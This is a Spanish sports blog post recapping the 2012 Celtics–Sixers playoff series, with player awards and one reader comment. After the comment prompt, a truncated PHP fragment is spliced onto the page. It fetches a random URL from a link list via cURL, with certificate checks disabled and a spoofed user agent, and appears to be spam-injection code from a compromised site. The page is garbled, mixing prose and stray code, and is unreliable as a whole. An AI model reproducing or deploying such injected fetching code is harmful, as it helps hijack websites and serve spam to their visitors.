Resumen Celtics 4 – Sixers 3

29 de May de 2012 por TheDeerHunter

La serie más igualada y emocionante de semifinales de conferencia nos deja un poso de insatisfacción por el nivel de juego desplegado y la sensación de interinidad de ambos. Es más que posible que ninguno de ellos hubiera llegado donde hallegado si Derrick Rose no se hubiera roto.

Se han juntado el hambre con las ganas de comer: Los Sixers con su táctica eminentemente destructiva contra unos Celtics al límite de sus fuerzas. Nadie ha podido imponerse dos partidos seguidos y nos hemos tenido que tragar más de un bodrio ganado a menos de 85 puntos.

No debería haber sido así. Ambos equipos estaban a priori capacitados para ser más ofensivos pero llegados a este punto del curso les ha sido imposible mantener el nivel. ¿Cómo vamos a criticar el planteamiento “barraquero” de Doug Collins viendo el rendimiento de su célebre segunda unidad? Sólo hay que comparar el desempeño de Lou Williams y Thaddeus Young entre la regular y esta serie. Algo verdaderamente dramático. Tampoco hemos visto la mejor versión de Spencer Hawes, de Jodie Meeks… y como mucho algún rato de Brand y Turner. Los Sixers han ido malviviendo a base de arreones emocionales, de la intermitente inspiración de Jrue Holiday y de defender como perros liderados por un Andre Iguodala tremendo.

Los Celtics, por su parte, han sobrevivido gracias al buen hacer de Garnett y a genialidades de Rondo, con alguna pincelada de Brandon Bass. Un Pierce renqueante ha sufrido la fortaleza de Iguodala y Ray Allen está esencialmente cojo. La lesión de Avery Bradley ha dejado un erial en una plantilla más corta de lo que cabría imaginar. En cualquier caso un 7º partido en el Garden es casi sinónimo de clasificación y el oficio de los verdes es un plus con el que no pueden contar otros.

PREMIOS 

MVP: Repartido. Kevin Garnett está en un 20-10 de reloj jugando de pívot. Hace no demasiado algunos lo daban por acabado. Él ha sido el yunque. El martillo ha sido Rajon Rondo y su alucinante capacidad de sacar petróleo.

Rookie: No puede entenderse la resistencia de los Sixers sin el buen hacer de Lavoy Allen. Ha subido más de 5 minutos su participación y por momentos, sus rebotes y defensa han sostenido todo el juego interior de Philadelphia.

Sorpresa: El escándalo de 5º choque de Brandon Bass en el que parecía la mismísima reencarnación de Karl Malone. A la postre ha resultado definitivo para la clasificación.

Decepción: El 34% en tiro de un hombre como Lou Williams que no llega a 3 asistencias. También Thaddeus Young y nuestro particular icono Joddie Meeks. Recordamos que durante algún tramo del curso fueron considerados como el mejor banco de la liga.

Esfuerzo en vano: Para no variar también múltiple. La chispa la ha puesto Jrue Holiday pero el trabajo de Andre Iguodala sobre Pierce,y su importancia en los momentos finales merecía un premio.

Comenta

Un comentario a esta entrada

  1. GreenPride dice:
    #1

    Eliminatoria dura y super-física donde los Celtics han impuesto su experiencia y clase para pasar adelante aprovechando el factor cancha en los partidos decisivos aunque sufriendo un calvario que se pudieron ahorrar si hubieran cerrado el 4º partido en el que fueron 18 arriba con 2-1 a favor en la serie. Tras un par de malos primeros partidos en Boston resueltos uno para cada equipo, los Celtics jugaron su mejor balonces en el 3º y mitad del 4º en Philly pero la reacción última de los Sixers a base de coraje y defensa dejó la eliminatoria lista para llegar al 7º. Y así fue, cada uno ganó en casa y llegados al 7º en el Garden hay que tener mucho más de lo que tienen estos Sixers para salir vivos de ahí.
    En Boston fenomenal Garnett que se ha comido él solito al juego interior de Philly, muy especialmente a un Hawes al que no ha dejado meter una y además le ha sobrepasado claramente en ataque. Muy bien Rondo, cuando el ha encontrado el ritmo los Celtics han volado de su mano. A veces peca de excesiva obsesión con el pase, pero ha hecho unas series tremendas. Decisivo el papel de Bass, para lo bueno y para lo malo. Cuando ha estado enchufado le ha dado esos puntos a Boston que tanto necesitan sin Bradley y con Ray Allen cojo. Pierce ha notado la defensa de Iguodala y su lesión pero aún así ha sido totalmente decisivo para la clasificación. Cuando Boston consiguió defender con eficacia las penetraciones de los Sixers y obligarles a perder balones se impuso claramente, cuando no pudo hacerlo sufrió muchísimo en estático para sumar puntos.
    Por los Sixers, gran serie de Holiday e Iguodala, tal como decís en el artículo. El primero ha puesto la clase y el saber hacer, el segundo la intensidad defensiva, el carácter y el liderazgo en la cancha. También buenos minutos de Brand en la serie metiendo sus tiros. Ha fallado el resto del equipo. Cumplidores Turner y Young aunque muy intermitentes y muchas veces anulados por la defensa verde, han quedado especialmente retratados Hawes (KG lo ha matado), Meeks, y Lou Williams
    Para los Celtics queda el pase y una última cabalgada de su Big 3 convertido en Big 4, para los Sixers la necesidad de buscar algún jugador decisivo que pueda liderar este equipo en anotación y llevarles a un nuevo nivel. Físicamente son muy buenos pero les falta mucha claridad para ser realmente candidatos a algo más importante.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>